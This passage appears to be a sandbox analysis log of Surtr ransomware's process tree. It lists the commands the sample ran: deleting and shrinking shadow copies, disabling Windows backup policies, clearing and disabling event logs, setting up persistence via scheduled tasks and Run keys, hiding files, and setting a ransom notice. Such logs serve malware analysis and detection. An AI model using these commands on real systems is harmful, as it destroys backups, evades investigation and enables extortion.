  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
  2⤵
  PID:5940
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
    3⤵
    PID:980
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
  2⤵
  PID:5856
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1896
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=unbounded
  2⤵
  PID:5848
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7396
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:5840
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:2752
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=unbounded
  2⤵
  PID:6424
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6324
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
  2⤵
  PID:6524
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4756
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=unbounded
  2⤵
  PID:6620
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4264
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
  2⤵
  PID:5772
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:2796
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:5764
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:8152
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=unbounded
  2⤵
  PID:5692
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:8176
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
  2⤵
  PID:6748
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4504
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
  2⤵
  PID:6964
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7652
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=unbounded
  2⤵
  PID:7024
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:8088
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
  2⤵
  PID:7076
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4176
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=unbounded
  2⤵
  PID:7160
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4616
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=unbounded
  2⤵
  PID:6872
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4204
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:5612
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:8140
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
  2⤵
  PID:7212
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7792
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=unbounded
  2⤵
  PID:7360
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:4804
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"
  2⤵
  PID:7860
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"
  2⤵
  PID:5936
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\PublicData_0r6fjlh4j8u4ts.surt" "%TEMP%\Service\PublicData_0r6fjlh4j8u4ts.surt"
  2⤵
  PID:5172
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\PrivateData_0r6fjlh4j8u4ts.surt" "%TEMP%\Service\PrivateData_0r6fjlh4j8u4ts.surt"
  2⤵
  PID:4400
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"
  2⤵
  PID:5256
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"
  2⤵
  PID:5128
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"
  2⤵
  PID:5508
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"
  2⤵
  PID:5600
- - C:\Windows\SysWOW64\attrib.exe
    attrib +R /S "C:\ProgramData\Service"
    3⤵
    - Views/modifies file attributes
    PID:4964
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"
  2⤵
  PID:5496
- - C:\Windows\SysWOW64\attrib.exe
    attrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"
    3⤵
    - Views/modifies file attributes
    PID:4888
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
  2⤵
  PID:5936
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:5172
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
  2⤵
  PID:1180
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:5328
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
  2⤵
  - Drops startup file
  PID:5616
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:5004
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:6724
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:1632
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:7096
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:4656
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:5888
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:4500
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:4712
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
  2⤵
  PID:1972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl Setup
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7196
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
  2⤵
  PID:4604
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl System
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1904
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
  2⤵
  PID:6896
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl Application
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5540
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c wevtutil.exe sl Security /e:false
  2⤵
  PID:284
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe sl Security /e:false
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6280
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
  2⤵
  PID:7024
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl Security
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5276
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F
  2⤵
  PID:292
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F
    3⤵
    - Creates scheduled task(s)
    PID:5268
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
  2⤵
  PID:4860
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
    3⤵
    PID:5444
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
  2⤵
  PID:7064
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
    3⤵
    PID:6088
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v Manufacturer /t REG_SZ /d "Tribute to the REvil <3" /f
  2⤵
  PID:4544
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v Manufacturer /t REG_SZ /d "Tribute to the REvil <3" /f
    3⤵
    PID:5568
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "Unfortunately , ALL Your Important Files Have Been Encrypted and Stolen By Surtr Ransomware. Find SURTR_README files and follow instructions." /f
  2⤵
  PID:6424
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "Unfortunately , ALL Your Important Files Have Been Encrypted and Stolen By Surtr Ransomware. Find SURTR_README files and follow instructions." /f
    3⤵
    PID:4724
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s "C:\ProgramData\Service\Surtr.exe"
  2⤵
  PID:5992
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s "C:\ProgramData\Service\Surtr.exe"
    3⤵
    - Views/modifies file attributes
    PID:4696
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s "%TEMP%\Service\Surtr.exe"
  2⤵
  PID:4312
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Service\Surtr.exe"
    3⤵
    - Views/modifies file attributes
    PID:5264
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exe"
  2⤵
  PID:4956
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exe"
    3⤵
    - Views/modifies file attributes
    PID:1812
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
  2⤵
  PID:5584
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
    3⤵
    - Drops startup file
    - Views/modifies file attributes
    PID:6064
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\Service\SurtrBackGround.jpg
  2⤵
  PID:4260
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s C:\ProgramData\Service\SurtrBackGround.jpg
    3⤵
    - Views/modifies file attributes
    PID:5472
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h C:\ProgramData\Service\SurtrIcon.ico
  2⤵
  PID:4676
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h C:\ProgramData\Service\SurtrIcon.ico
    3⤵
    - Views/modifies file attributes
    PID:5720
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surtr /va /f
  2⤵
  PID:5480
- - C:\Windows\SysWOW64\reg.exe
    reg DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surtr /va /f
    3⤵
    PID:4828
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surtr\UserChoice /v ProgId /t REG_SZ /d surtr_auto_file /f
  2⤵
  PID:6364
- - C:\Windows\SysWOW64\reg.exe
    reg ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surtr\UserChoice /v ProgId /t REG_SZ /d surtr_auto_file /f
    3⤵
    PID:452
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg ADD HKEY_CLASSES_ROOT\.surtr /ve /t REG_SZ /d surtr_auto_file /f
  2⤵
  PID:5024
- - C:\Windows\SysWOW64\reg.exe
    reg ADD HKEY_CLASSES_ROOT\.surtr /ve /t REG_SZ /d surtr_auto_file /f
    3⤵
    - Modifies registry class
    PID:5032
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg ADD HKEY_CLASSES_ROOT\surtr_auto_file\DefaultIcon /ve /t REG_SZ /d "C:\ProgramData\Service\SurtrIcon.ico" /f
  2⤵
  PID:4880
- - C:\Windows\SysWOW64\reg.exe
    reg ADD HKEY_CLASSES_ROOT\surtr_auto_file\DefaultIcon /ve /t REG_SZ /d "C:\ProgramData\Service\SurtrIcon.ico" /f
    3⤵
    - Modifies registry class
    PID:5536
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
  2⤵
  PID:6468
- - C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:5488
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:5652

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6952

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7288

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:3408

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:4876

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6336